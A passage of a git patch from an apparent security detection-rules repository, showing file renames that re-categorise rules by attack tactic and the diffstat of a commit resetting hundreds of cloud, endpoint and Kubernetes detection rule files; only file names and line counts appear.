to rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml diff --git a/rules/windows/defense_evasion_uac_bypass_com_clipup.toml b/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml similarity index 100% rename from rules/windows/defense_evasion_uac_bypass_com_clipup.toml rename to rules/windows/privilege_escalation_uac_bypass_com_clipup.toml diff --git a/rules/windows/defense_evasion_uac_bypass_com_ieinstal.toml b/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml similarity index 100% rename from rules/windows/defense_evasion_uac_bypass_com_ieinstal.toml rename to rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml diff --git a/rules/windows/defense_evasion_uac_bypass_com_interface_icmluautil.toml b/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml similarity index 100% rename from rules/windows/defense_evasion_uac_bypass_com_interface_icmluautil.toml rename to rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml diff --git a/rules/windows/defense_evasion_uac_bypass_diskcleanup_hijack.toml b/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml similarity index 100% rename from rules/windows/defense_evasion_uac_bypass_diskcleanup_hijack.toml rename to rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml diff --git a/rules/windows/defense_evasion_uac_bypass_dll_sideloading.toml b/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml similarity index 100% rename from rules/windows/defense_evasion_uac_bypass_dll_sideloading.toml rename to rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml diff --git a/rules/windows/defense_evasion_uac_bypass_event_viewer.toml b/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml similarity index 100% rename from rules/windows/defense_evasion_uac_bypass_event_viewer.toml rename to rules/windows/privilege_escalation_uac_bypass_event_viewer.toml diff --git a/rules/windows/defense_evasion_uac_bypass_mock_windir.toml b/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml similarity index 100% rename from rules/windows/defense_evasion_uac_bypass_mock_windir.toml rename to rules/windows/privilege_escalation_uac_bypass_mock_windir.toml diff --git a/rules/windows/defense_evasion_uac_bypass_winfw_mmc_hijack.toml b/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml similarity index 100% rename from rules/windows/defense_evasion_uac_bypass_winfw_mmc_hijack.toml rename to rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml diff --git a/rules/windows/defense_evasion_unusual_parentchild_relationship.toml b/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml similarity index 100% rename from rules/windows/defense_evasion_unusual_parentchild_relationship.toml rename to rules/windows/privilege_escalation_unusual_parentchild_relationship.toml diff --git a/rules/windows/defense_evasion_unusual_svchost_childproc_childless.toml b/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml similarity index 100% rename from rules/windows/defense_evasion_unusual_svchost_childproc_childless.toml rename to rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml diff --git a/rules/windows/defense_evasion_via_token_theft.toml b/rules/windows/privilege_escalation_via_token_theft.toml similarity index 100% rename from rules/windows/defense_evasion_via_token_theft.toml rename to rules/windows/privilege_escalation_via_token_theft.toml diff --git a/rules/windows/persistence_windows_service_via_unusual_client.toml b/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml similarity index 100% rename from rules/windows/persistence_windows_service_via_unusual_client.toml rename to rules/windows/privilege_escalation_windows_service_via_unusual_client.toml diff --git a/rules_building_block/defense_evasion_bitsadmin_activity.toml b/rules_building_block/command_and_control_bitsadmin_activity.toml similarity index 100% rename from rules_building_block/defense_evasion_bitsadmin_activity.toml rename to rules_building_block/command_and_control_bitsadmin_activity.toml diff --git a/rules_building_block/initial_access_entra_id_risk_detection_signal.toml b/rules_building_block/credential_access_entra_id_risk_detection_signal.toml similarity index 100% rename from rules_building_block/initial_access_entra_id_risk_detection_signal.toml rename to rules_building_block/credential_access_entra_id_risk_detection_signal.toml diff --git a/rules_building_block/defense_evasion_mdmp_file_unusual_extension.toml b/rules_building_block/credential_access_mdmp_file_unusual_extension.toml similarity index 100% rename from rules_building_block/defense_evasion_mdmp_file_unusual_extension.toml rename to rules_building_block/credential_access_mdmp_file_unusual_extension.toml diff --git a/rules_building_block/execution_download_susp_extension.toml b/rules_building_block/defense_evasion_download_susp_extension.toml similarity index 100% rename from rules_building_block/execution_download_susp_extension.toml rename to rules_building_block/defense_evasion_download_susp_extension.toml diff --git a/rules_building_block/execution_injection_from_msoffice.toml b/rules_building_block/defense_evasion_injection_from_msoffice.toml similarity index 100% rename from rules_building_block/execution_injection_from_msoffice.toml rename to rules_building_block/defense_evasion_injection_from_msoffice.toml diff --git a/rules_building_block/execution_outlook_suspicious_child.toml b/rules_building_block/defense_evasion_outlook_suspicious_child.toml similarity index 100% rename from rules_building_block/execution_outlook_suspicious_child.toml rename to rules_building_block/defense_evasion_outlook_suspicious_child.toml diff --git a/rules_building_block/persistence_service_path_registry.toml b/rules_building_block/defense_evasion_service_path_registry.toml similarity index 100% rename from rules_building_block/persistence_service_path_registry.toml rename to rules_building_block/defense_evasion_service_path_registry.toml diff --git a/rules_building_block/persistence_services_exe_path.toml b/rules_building_block/defense_evasion_services_exe_path.toml similarity index 100% rename from rules_building_block/persistence_services_exe_path.toml rename to rules_building_block/defense_evasion_services_exe_path.toml diff --git a/rules_building_block/persistence_write_dac_access.toml b/rules_building_block/defense_evasion_write_dac_access.toml similarity index 100% rename from rules_building_block/persistence_write_dac_access.toml rename to rules_building_block/defense_evasion_write_dac_access.toml diff --git a/rules_building_block/credential_access_capnetraw_capability.toml b/rules_building_block/discovery_capnetraw_capability.toml similarity index 100% rename from rules_building_block/credential_access_capnetraw_capability.toml rename to rules_building_block/discovery_capnetraw_capability.toml diff --git a/rules_building_block/persistence_linux_modprobe_enumeration.toml b/rules_building_block/discovery_linux_modprobe_enumeration.toml similarity index 100% rename from rules_building_block/persistence_linux_modprobe_enumeration.toml rename to rules_building_block/discovery_linux_modprobe_enumeration.toml diff --git a/rules_building_block/defense_evasion_linux_sysctl_enumeration.toml b/rules_building_block/discovery_linux_sysctl_enumeration.toml similarity index 100% rename from rules_building_block/defense_evasion_linux_sysctl_enumeration.toml rename to rules_building_block/discovery_linux_sysctl_enumeration.toml diff --git a/rules_building_block/persistence_github_new_event_action_for_pat.toml b/rules_building_block/execution_github_new_event_action_for_pat.toml similarity index 100% rename from rules_building_block/persistence_github_new_event_action_for_pat.toml rename to rules_building_block/execution_github_new_event_action_for_pat.toml diff --git a/rules_building_block/collection_github_new_repo_interaction_for_pat.toml b/rules_building_block/execution_github_new_repo_interaction_for_pat.toml similarity index 100% rename from rules_building_block/collection_github_new_repo_interaction_for_pat.toml rename to rules_building_block/execution_github_new_repo_interaction_for_pat.toml diff --git a/rules_building_block/collection_github_new_repo_interaction_for_user.toml b/rules_building_block/execution_github_new_repo_interaction_for_user.toml similarity index 100% rename from rules_building_block/collection_github_new_repo_interaction_for_user.toml rename to rules_building_block/execution_github_new_repo_interaction_for_user.toml diff --git a/rules_building_block/resource_development_github_repo_created.toml b/rules_building_block/execution_github_repo_created.toml similarity index 100% rename from rules_building_block/resource_development_github_repo_created.toml rename to rules_building_block/execution_github_repo_created.toml diff --git a/rules_building_block/collection_github_repo_interaction_from_new_ip.toml b/rules_building_block/execution_github_repo_interaction_from_new_ip.toml similarity index 100% rename from rules_building_block/collection_github_repo_interaction_from_new_ip.toml rename to rules_building_block/execution_github_repo_interaction_from_new_ip.toml diff --git a/rules_building_block/defense_evasion_settingcontent_ms_file_creation.toml b/rules_building_block/execution_settingcontent_ms_file_creation.toml similarity index 100% rename from rules_building_block/defense_evasion_settingcontent_ms_file_creation.toml rename to rules_building_block/execution_settingcontent_ms_file_creation.toml diff --git a/rules_building_block/execution_anomalous_rsc_flight_data_patterns.toml b/rules_building_block/initial_access_anomalous_rsc_flight_data_patterns.toml similarity index 100% rename from rules_building_block/execution_anomalous_rsc_flight_data_patterns.toml rename to rules_building_block/initial_access_anomalous_rsc_flight_data_patterns.toml diff --git a/rules_building_block/defense_evasion_github_new_ip_address_for_pat.toml b/rules_building_block/initial_access_github_new_ip_address_for_pat.toml similarity index 100% rename from rules_building_block/defense_evasion_github_new_ip_address_for_pat.toml rename to rules_building_block/initial_access_github_new_ip_address_for_pat.toml diff --git a/rules_building_block/credential_access_okta_admin_console_login_failure.toml b/rules_building_block/initial_access_okta_admin_console_login_failure.toml similarity index 100% rename from rules_building_block/credential_access_okta_admin_console_login_failure.toml rename to rules_building_block/initial_access_okta_admin_console_login_failure.toml diff --git a/rules_building_block/execution_at.toml b/rules_building_block/lateral_movement_at.toml similarity index 100% rename from rules_building_block/execution_at.toml rename to rules_building_block/lateral_movement_at.toml diff --git a/rules_building_block/execution_posh_winrm_activity.toml b/rules_building_block/lateral_movement_posh_winrm_activity.toml similarity index 100% rename from rules_building_block/execution_posh_winrm_activity.toml rename to rules_building_block/lateral_movement_posh_winrm_activity.toml diff --git a/rules_building_block/execution_unusual_process_sql_accounts.toml b/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml similarity index 100% rename from rules_building_block/execution_unusual_process_sql_accounts.toml rename to rules_building_block/lateral_movement_unusual_process_sql_accounts.toml diff --git a/rules_building_block/execution_wmic_remote.toml b/rules_building_block/lateral_movement_wmic_remote.toml similarity index 100% rename from rules_building_block/execution_wmic_remote.toml rename to rules_building_block/lateral_movement_wmic_remote.toml diff --git a/rules_building_block/defense_evasion_github_new_pat_for_user.toml b/rules_building_block/persistence_github_new_pat_for_user.toml similarity index 100% rename from rules_building_block/defense_evasion_github_new_pat_for_user.toml rename to rules_building_block/persistence_github_new_pat_for_user.toml diff --git a/rules_building_block/initial_access_web_server_potential_sql_injection.toml b/rules_building_block/persistence_web_server_potential_sql_injection.toml similarity index 100% rename from rules_building_block/initial_access_web_server_potential_sql_injection.toml rename to rules_building_block/persistence_web_server_potential_sql_injection.toml diff --git a/rules_building_block/defense_evasion_sts_getsessiontoken_abuse.toml b/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml similarity index 100% rename from rules_building_block/defense_evasion_sts_getsessiontoken_abuse.toml rename to rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml From 0042eb1179768107c05f70ebec1b33a117748d9b Mon Sep 17 00:00:00 2001 From: Mika Ayenson Date: Tue, 24 Mar 2026 12:33:23 -0500 Subject: [PATCH 09/16] reset rules to main --- rules/apm/apm_403_response_to_a_post.toml | 16 +- .../apm_405_response_method_not_allowed.toml | 16 +- rules/apm/apm_sqlmap_user_agent.toml | 21 +- ...mmand_and_control_common_llm_endpoint.toml | 24 +- ...rol_curl_wget_spawn_via_nodejs_parent.toml | 23 +- ...nai_process_suspicious_tld_connection.toml | 10 +- ..._control_genai_process_unusual_domain.toml | 18 +- ...nd_control_suricata_elastic_defend_c2.toml | 9 +- .../command_and_control_tunnel_qemu.toml | 11 +- ...s_genai_process_sensitive_file_access.toml | 57 ++-- .../credential_access_gitleaks_execution.toml | 16 +- ...redential_access_trufflehog_execution.toml | 16 +- ...e_evasion_deleting_websvr_access_logs.toml | 8 +- ..._evasion_encoding_rot13_python_script.toml | 13 +- ...nse_evasion_genai_config_modification.toml | 36 ++- ...n_genai_process_compiling_executables.toml | 43 ++- ...ss_encoding_prior_to_network_activity.toml | 46 ++- ...se_evasion_missing_events_after_alert.toml | 36 ++- ...asion_whitespace_padding_command_line.toml | 40 ++- ...y_virtual_machine_fingerprinting_grep.toml | 42 +-- ..._server_local_file_inclusion_activity.toml | 174 +++++++++++ ...server_remote_file_inclusion_activity.toml | 135 +++++++++ .../execution_aws_ec2_lolbin_via_ssm.toml | 44 ++- ...rnetes_api_request_by_usual_utilities.toml | 140 +++++++++ ...ct_interactive_kubernetes_api_request.toml | 144 +++++++++ ...tes_api_activity_by_unusual_utilities.toml | 164 ++++++++++ ...ss_followed_by_kubernetes_api_request.toml | 137 +++++++++ .../execution_git_exploit_cve_2025_48384.toml | 28 +- ..._pre_or_post_install_script_execution.toml | 52 +++- ...xecution_openclaw_agent_child_process.toml | 64 ++-- ...on_pentest_eggshell_remote_admin_tool.toml | 20 +- ...otential_widespread_malware_infection.toml | 20 +- ...ontainer_creation_with_host_reference.toml | 27 +- ...cution_register_github_actions_runner.toml | 126 ++++++++ .../execution_revershell_via_shell_cmd.toml | 102 +++++++ .../execution_sap_netweaver_jsp_webshell.toml | 90 ++++++ ...execution_sap_netweaver_webshell_exec.toml | 67 ++--- ...tion_suspicious_java_netcon_childproc.toml | 40 +-- .../execution_via_github_actions_runner.toml | 71 ++--- ...er_tracking_id_tampering_via_env_vars.toml | 163 ++++++++++ ...t_alert_from_a_process_with_cpu_spike.toml | 9 +- .../impact_alerts_on_host_with_cpu_spike.toml | 12 +- ..._access_azure_o365_with_network_alert.toml | 41 +-- ...defend_alert_genai_utility_descendant.toml | 17 +- ...ccess_execution_susp_react_serv_child.toml | 29 +- ...s_exfiltration_new_usb_device_mounted.toml | 29 +- ..._ssl_vpn_login_followed_by_siem_alert.toml | 9 +- ...ial_access_ollama_api_external_access.toml | 30 +- ..._access_zoom_meeting_with_no_passcode.toml | 15 +- ...tiple_alerts_by_host_ip_and_source_ip.toml | 16 +- ...erts_email_elastic_defend_correlation.toml | 25 +- ...le_alerts_llm_compromised_user_triage.toml | 23 +- ...ence_ssh_authorized_keys_modification.toml | 42 ++- ...eb_server_potential_command_injection.toml | 76 ++++- ...lege_escalation_echo_nopasswd_sudoers.toml | 34 +-- ...ation_setuid_setgid_bit_set_via_chmod.toml | 28 +- .../privilege_escalation_trap_execution.toml | 20 +- ..._server_discovery_or_fuzzing_activity.toml | 7 +- ...eb_server_unusual_spike_in_error_logs.toml | 7 +- ...unusual_spike_in_error_response_codes.toml | 7 +- ...ssance_web_server_unusual_user_agents.toml | 33 +- ...collection_cloudtrail_logging_created.toml | 30 +- ...nticated_bucket_access_by_rare_source.toml | 22 +- ...cess_aws_getpassword_for_ec2_instance.toml | 10 +- ...ial_access_iam_user_addition_to_group.toml | 31 +- ...cess_root_console_failure_brute_force.toml | 8 +- ...se_evasion_cloudtrail_logging_deleted.toml | 13 +- ..._evasion_cloudtrail_logging_suspended.toml | 13 +- ...nse_evasion_cloudwatch_alarm_deletion.toml | 12 +- ..._evasion_config_service_rule_deletion.toml | 12 +- ...vasion_configuration_recorder_stopped.toml | 12 +- ...ion_ec2_serial_console_access_enabled.toml | 39 ++- ...defense_evasion_rds_instance_restored.toml | 35 +-- ...sion_s3_bucket_configuration_deletion.toml | 16 +- ..._s3_bucket_lifecycle_expiration_added.toml | 37 ++- .../aws/defense_evasion_sqs_purge_queue.toml | 33 +- ...ense_evasion_sts_get_federation_token.toml | 31 +- ...ec2_userdata_request_for_ec2_instance.toml | 22 +- ...eration_via_update_assume_role_policy.toml | 30 +- ...iscovery_ssm_inventory_reconnaissance.toml | 10 +- ...mbda_external_layer_added_to_function.toml | 33 +- ..._new_terms_cloudformation_createstack.toml | 10 +- ...tration_dynamodb_scan_by_unusual_user.toml | 25 +- .../aws/exfiltration_ec2_export_task.toml | 47 ++- ..._full_network_packet_capture_detected.toml | 43 ++- .../aws/exfiltration_rds_snapshot_export.toml | 28 +- ...icy_added_for_external_account_access.toml | 38 ++- ...bucket_policy_added_for_public_access.toml | 38 ++- ...ns_rare_protocol_subscription_by_user.toml | 46 ++- ..._eventbridge_rule_disabled_or_deleted.toml | 26 +- ..._s3_bucket_enumeration_or_brute_force.toml | 39 ++- .../impact_cloudtrail_logging_updated.toml | 45 ++- .../impact_cloudwatch_log_group_deletion.toml | 34 ++- ...impact_cloudwatch_log_stream_deletion.toml | 34 ++- .../impact_ec2_disable_ebs_encryption.toml | 34 ++- ...mpact_ec2_ebs_snapshot_access_removed.toml | 8 +- .../aws/impact_iam_deactivate_mfa_device.toml | 36 ++- ..._cluster_deletion_protection_disabled.toml | 27 +- .../aws/impact_rds_snapshot_deleted.toml | 11 +- ...t_object_uploaded_with_ransom_keyword.toml | 18 +- .../initial_access_console_login_root.toml | 31 +- .../aws/initial_access_password_recovery.toml | 15 +- ...tance_connect_ssh_public_key_uploaded.toml | 39 ++- ...l_movement_ec2_instance_console_login.toml | 75 +++-- ...ns_topic_message_publish_by_rare_user.toml | 44 ++- .../ml_cloudtrail_error_message_spike.toml | 36 ++- .../aws/ml_cloudtrail_rare_error_code.toml | 60 +++- .../ml_cloudtrail_rare_method_by_city.toml | 20 +- .../ml_cloudtrail_rare_method_by_country.toml | 20 +- .../ml_cloudtrail_rare_method_by_user.toml | 57 +++- ...ttempt_to_register_virtual_mfa_device.toml | 17 +- .../persistence_ec2_network_acl_creation.toml | 27 +- ...e_ec2_route_table_modified_or_deleted.toml | 29 +- ..._group_configuration_change_detection.toml | 23 +- ..._iam_api_calls_via_user_session_token.toml | 32 +- ...nce_iam_create_login_profile_for_root.toml | 16 +- .../aws/persistence_iam_group_creation.toml | 16 +- ...persistence_iam_oidc_provider_created.toml | 32 +- ...ce_iam_roles_anywhere_profile_created.toml | 33 +- ...usted_anchor_created_with_external_ca.toml | 13 +- ...persistence_iam_saml_provider_created.toml | 31 +- ...oor_invoke_function_for_any_principal.toml | 30 +- ...nce_rds_db_instance_password_modified.toml | 35 ++- .../persistence_rds_instance_made_public.toml | 32 +- ...oute_53_domain_transfer_lock_disabled.toml | 33 +- ...domain_transferred_to_another_account.toml | 28 +- ..._53_hosted_zone_associated_with_a_vpc.toml | 46 ++- .../aws/persistence_route_table_created.toml | 29 +- ...e_sensitive_operations_via_cloudshell.toml | 27 +- ...sistence_sts_assume_role_with_new_mfa.toml | 58 ++-- ...tratoraccess_policy_attached_to_group.toml | 24 +- ...stratoraccess_policy_attached_to_role.toml | 24 +- ...stratoraccess_policy_attached_to_user.toml | 30 +- ...tomer_managed_policy_attached_to_role.toml | 35 +-- ..._escalation_iam_saml_provider_updated.toml | 31 +- ...alation_iam_update_assume_role_policy.toml | 43 ++- ...escalation_role_assumption_by_service.toml | 42 ++- ...ge_escalation_role_assumption_by_user.toml | 36 ++- ...oot_from_rare_user_and_member_account.toml | 24 +- ...rivilege_escalation_sts_role_chaining.toml | 62 ++-- ...opment_sns_topic_created_by_rare_user.toml | 27 +- ..._bedrock_execution_without_guardrails.toml | 50 +-- ...ls_multiple_violations_by_single_user.toml | 24 +- ...multiple_violations_in_single_request.toml | 24 +- ...confidence_misconduct_blocks_detected.toml | 24 +- ...k_high_resource_consumption_detection.toml | 82 +---- ...attempts_to_use_denied_models_by_user.toml | 24 +- ...ve_information_policy_blocks_detected.toml | 24 +- ...multiple_topic_policy_blocks_detected.toml | 24 +- ...ation_exception_errors_by_single_user.toml | 26 +- ..._multiple_word_policy_blocks_detected.toml | 29 +- ...point_access_from_unusual_application.toml | 21 +- ...ss_by_unusual_public_client_via_graph.toml | 8 +- ...s_azure_entra_susp_device_code_signin.toml | 21 +- ...s_azure_storage_account_keys_accessed.toml | 31 +- ...s_entra_id_excessive_account_lockouts.toml | 17 +- ...ial_access_entra_id_suspicious_signin.toml | 39 ++- ...ss_entra_id_totp_brute_force_attempts.toml | 10 +- ..._access_key_vault_excessive_retrieval.toml | 33 +- ...ccess_storage_account_key_regenerated.toml | 28 +- ...se_evasion_automation_runbook_deleted.toml | 21 +- ...insights_diagnostic_settings_deletion.toml | 10 +- ...nse_evasion_kubernetes_events_deleted.toml | 16 +- ...ense_evasion_network_watcher_deletion.toml | 10 +- ...curity_alert_suppression_rule_created.toml | 8 +- ...overy_bloodhound_user_agents_detected.toml | 24 +- ...d_teamfiltration_user_agents_detected.toml | 82 +++-- ...ge_blob_container_access_modification.toml | 29 +- ...torage_blob_download_azcopy_sas_token.toml | 33 +- ...ct_azure_compute_vm_snapshot_deletion.toml | 8 +- ...t_azure_compute_vm_snapshot_deletions.toml | 8 +- ...impact_azure_storage_account_deletion.toml | 10 +- ...ure_storage_account_deletion_multiple.toml | 10 +- ...ct_key_vault_modified_by_unusual_user.toml | 10 +- .../azure/impact_kubernetes_pod_deleted.toml | 10 +- ...act_resources_resource_group_deletion.toml | 22 +- ...ster_credential_access_unusual_source.toml | 38 +-- ..._actor_token_user_impersonation_abuse.toml | 48 ++- ...d_device_code_auth_with_broker_client.toml | 51 ++-- ...s_entra_id_external_guest_user_invite.toml | 26 +- ..._id_federated_login_by_unusual_client.toml | 51 ++-- ...a_id_first_time_seen_device_code_auth.toml | 21 +- ...ingle_session_from_multiple_addresses.toml | 41 ++- ...sent_grant_via_registered_application.toml | 47 +-- ..._code_grant_unusual_app_resource_user.toml | 42 ++- ...via_first_party_microsoft_application.toml | 46 ++- ...tra_id_oauth_user_impersonation_scope.toml | 29 +- ...ial_access_entra_id_powershell_signin.toml | 24 +- ...a_id_protection_sign_in_risk_detected.toml | 57 +++- ...ntra_id_protection_user_risk_detected.toml | 43 ++- ...tra_id_rare_app_id_for_principal_auth.toml | 49 +-- ...cation_requirement_for_principal_user.toml | 37 ++- ...ous_oauth_flow_via_auth_broker_to_drs.toml | 49 ++- ...ph_first_occurrence_of_client_request.toml | 41 +-- .../azure/ml_azure_event_failures.toml | 33 +- .../azure/ml_azure_rare_event_failures.toml | 60 +++- .../azure/ml_azure_rare_method_by_city.toml | 21 +- .../ml_azure_rare_method_by_country.toml | 21 +- .../azure/ml_azure_rare_method_by_user.toml | 61 +++- ...ersistence_automation_account_created.toml | 23 +- ...ersistence_automation_webhook_created.toml | 15 +- ...id_conditional_access_policy_modified.toml | 32 +- ...id_global_administrator_role_assigned.toml | 34 +-- ...stence_entra_id_mfa_disabled_for_user.toml | 32 +- ..._entra_id_pim_user_added_global_admin.toml | 24 +- ...ged_identity_management_role_modified.toml | 44 +-- ...rt_to_prt_transition_from_user_device.toml | 40 ++- ...d_service_principal_credentials_added.toml | 32 +- ...e_principal_federated_issuer_modified.toml | 36 ++- ...nant_domain_federation_via_audit_logs.toml | 47 ++- ..._added_as_owner_for_azure_application.toml | 22 +- ..._as_owner_for_azure_service_principal.toml | 33 +- ...id_user_signed_in_from_unusual_device.toml | 49 +-- ...sistence_event_hub_created_or_updated.toml | 32 +- ...ce_graph_eam_addition_or_modification.toml | 30 +- ..._protect_alert_followed_by_device_reg.toml | 13 +- ...ure_rbac_administrator_roles_assigned.toml | 29 +- ..._elevate_to_user_administrator_access.toml | 32 +- ...on_kubernetes_aks_rolebinding_created.toml | 44 +-- ...a_id_custom_domain_added_and_verified.toml | 19 +- ...openai_denial_of_ml_service_detection.toml | 41 +-- ...ai_insecure_output_handling_detection.toml | 22 +- .../azure_openai_model_theft_detection.toml | 62 +--- .../command_and_control_beaconing.toml | 16 +- ...and_control_beaconing_high_confidence.toml | 16 +- ...socks_proxy_detected_inside_container.toml | 8 +- ...teractive_file_download_from_internet.toml | 51 +++- ...control_tunneling_and_port_forwarding.toml | 7 +- ..._files_compression_inside_a_container.toml | 141 +++++++++ ...r_passwords_search_inside_a_container.toml | 24 +- ...ss_service_account_token_or_cert_read.toml | 7 +- ..._decoded_payload_piped_to_interpreter.toml | 64 ++-- ...le_creation_execution_deletion_cradle.toml | 152 ++++++++++ ...s_execution_from_suspicious_directory.toml | 49 +-- ...ed_object_modified_inside_a_container.toml | 29 +- ...potential_evasion_via_encoded_payload.toml | 45 ++- .../discovery_dns_enumeration.toml | 12 +- .../discovery_environment_enumeration.toml | 7 +- ...overy_kubelet_certificate_file_access.toml | 103 +++++++ ..._enumeration_from_interactive_process.toml | 12 +- ...covery_service_account_namespace_read.toml | 7 +- ...work_tool_launched_inside_a_container.toml | 44 ++- .../discovery_tool_enumeration.toml | 7 +- ...ct_interactive_kubernetes_api_request.toml | 151 ++++++++++ ...e_file_creation_followed_by_execution.toml | 31 +- ...e_creation_in_system_binary_locations.toml | 115 +++++++ ...shell_spawned_from_inside_a_container.toml | 7 +- .../execution_kubeletctl_execution.toml | 13 +- ...stener_established_inside_a_container.toml | 127 ++++++++ ...payload_downloaded_and_piped_to_shell.toml | 136 +++++++++ ...irect_kubelet_access_via_process_args.toml | 107 +++++++ ...ecutable_via_chmod_inside_a_container.toml | 124 ++++++++ ...ractive_interpreter_command_execution.toml | 73 +++-- ...ication_of_persistence_relevant_files.toml | 72 +++-- ..._keys_modification_inside_a_container.toml | 40 ++- ...e_suspicious_echo_or_printf_execution.toml | 162 ++++++++++ ...ous_webserver_child_process_execution.toml | 284 ++++++++++++++++++ ...berarkpas_error_audit_event_promotion.toml | 22 +- ...commended_events_to_monitor_promotion.toml | 22 +- ...ration_ml_high_bytes_destination_port.toml | 26 +- ...high_bytes_written_to_external_device.toml | 8 +- ...re_process_writing_to_external_device.toml | 8 +- ...d_control_ml_dga_high_sum_probability.toml | 8 +- ...istence_suspicious_file_modifications.toml | 124 ++++---- ...collection_gcp_pub_sub_topic_creation.toml | 15 +- ...nse_evasion_gcp_firewall_rule_created.toml | 8 +- ...nse_evasion_gcp_firewall_rule_deleted.toml | 8 +- ...se_evasion_gcp_firewall_rule_modified.toml | 8 +- ...e_evasion_gcp_logging_bucket_deletion.toml | 8 +- ...nse_evasion_gcp_logging_sink_deletion.toml | 8 +- ...ion_gcp_pub_sub_subscription_deletion.toml | 26 +- ...se_evasion_gcp_pub_sub_topic_deletion.toml | 26 +- ...p_storage_bucket_permissions_modified.toml | 45 +-- ...virtual_private_cloud_network_deleted.toml | 31 +- ...p_virtual_private_cloud_route_created.toml | 19 +- ...p_virtual_private_cloud_route_deleted.toml | 19 +- ...tration_gcp_logging_sink_modification.toml | 29 +- ...l_access_gcp_iam_custom_role_creation.toml | 47 ++- .../gcp/ml_gcp_error_message_spike.toml | 33 +- .../gcp/ml_gcp_rare_error_code.toml | 59 +++- .../gcp/ml_gcp_rare_method_by_city.toml | 22 +- .../gcp/ml_gcp_rare_method_by_country.toml | 22 +- .../gcp/ml_gcp_rare_method_by_user.toml | 57 +++- ..._gcp_iam_service_account_key_deletion.toml | 26 +- ...e_gcp_key_created_for_service_account.toml | 8 +- ...rsistence_gcp_service_account_created.toml | 8 +- ...hub_protected_branch_settings_changed.toml | 10 +- .../github/execution_github_app_deleted.toml | 25 +- ..._high_number_of_cloned_repos_from_pat.toml | 37 +-- ...multiple_behavior_alerts_from_account.toml | 10 +- .../execution_new_github_app_installed.toml | 25 +- ...thub_private_repository_turned_public.toml | 24 +- ...ration_high_number_of_cloning_by_user.toml | 38 ++- ...b_repository_activity_from_unusual_ip.toml | 52 +++- ...umber_of_closed_pull_requests_by_user.toml | 45 ++- ...protected_branch_force_pushes_by_user.toml | 45 ++- ...protected_branch_force_pushes_by_user.toml | 42 ++- ...github_actions_bot_first_push_to_repo.toml | 50 +-- ...ub_actions_workflow_injection_blocked.toml | 29 +- ...ss_github_register_self_hosted_runner.toml | 14 +- .../persistence_github_org_owner_added.toml | 44 ++- .../github/persistence_new_pat_created.toml | 36 ++- ...tence_organization_owner_role_granted.toml | 32 +- ...ship_transferred_via_google_workspace.toml | 29 +- ...yption_key_accessed_by_anonymous_user.toml | 28 +- ...ed_from_blocklist_in_google_workspace.toml | 16 +- ...d_to_google_workspace_trusted_domains.toml | 16 +- ...marketplace_modified_to_allow_any_app.toml | 16 +- ...le_workspace_mfa_enforcement_disabled.toml | 44 +-- ..._user_added_to_google_workspace_group.toml | 30 +- ...ogle_workspace_suspended_user_renewed.toml | 24 +- ...ed_to_external_drive_with_app_consent.toml | 41 ++- ...tion_added_to_google_workspace_domain.toml | 8 +- ..._google_workspace_2sv_policy_disabled.toml | 34 +-- ...workspace_admin_role_assigned_to_user.toml | 31 +- ...e_workspace_custom_admin_role_created.toml | 32 +- ...le_workspace_password_policy_modified.toml | 25 +- ...stence_google_workspace_role_modified.toml | 32 +- ...pace_user_organizational_unit_changed.toml | 31 +- ...led_for_google_workspace_organization.toml | 34 +-- ...ure_arc_proxy_secret_configmap_access.toml | 35 ++- .../defense_evasion_events_deleted.toml | 7 +- ...covery_denied_service_account_request.toml | 29 +- ...covery_suspicious_self_subject_review.toml | 8 +- ...ymous_create_update_patch_pod_request.toml | 7 +- .../execution_forbidden_creation_request.toml | 21 +- ...bidden_request_from_unsual_user_agent.toml | 22 +- ...nusual_request_response_by_user_agent.toml | 23 +- ...l_access_anonymous_request_authorized.toml | 12 +- ...ed_service_created_with_type_nodeport.toml | 18 +- ...ted_with_excessive_linux_capabilities.toml | 26 +- ...e_escalation_pod_created_with_hostipc.toml | 26 +- ...calation_pod_created_with_hostnetwork.toml | 26 +- ...e_escalation_pod_created_with_hostpid.toml | 26 +- ...reated_with_sensitive_hostpath_volume.toml | 26 +- ...ege_escalation_privileged_pod_created.toml | 26 +- ...nge_followed_by_workload_modification.toml | 36 +-- ...e_workload_modification_by_user_agent.toml | 49 ++- ..._service_account_rbac_write_operation.toml | 14 +- ...ignment_of_controller_service_account.toml | 20 +- ...ovement_ml_high_mean_rdp_process_args.toml | 35 +-- ...ent_ml_high_mean_rdp_session_duration.toml | 14 +- ...ral_movement_ml_high_remote_file_size.toml | 11 +- ...ml_high_variance_rdp_session_duration.toml | 14 +- ...ovement_ml_rare_remote_file_directory.toml | 11 +- ...ovement_ml_rare_remote_file_extension.toml | 11 +- ...spike_in_connections_from_a_source_ip.toml | 14 +- ...ke_in_connections_to_a_destination_ip.toml | 14 +- ...al_movement_ml_spike_in_rdp_processes.toml | 14 +- ...ent_ml_spike_in_remote_file_transfers.toml | 30 +- ...nt_ml_unusual_time_for_an_rdp_session.toml | 14 +- ...ion_onedrive_excessive_file_downloads.toml | 24 +- ...arepoint_file_download_via_powershell.toml | 25 +- ...a_id_device_reg_via_oauth_redirection.toml | 37 ++- ...access_identity_user_account_lockouts.toml | 15 +- ...on_entra_id_susp_oauth2_authorization.toml | 36 ++- ...e_evasion_exchange_dlp_policy_removed.toml | 7 +- 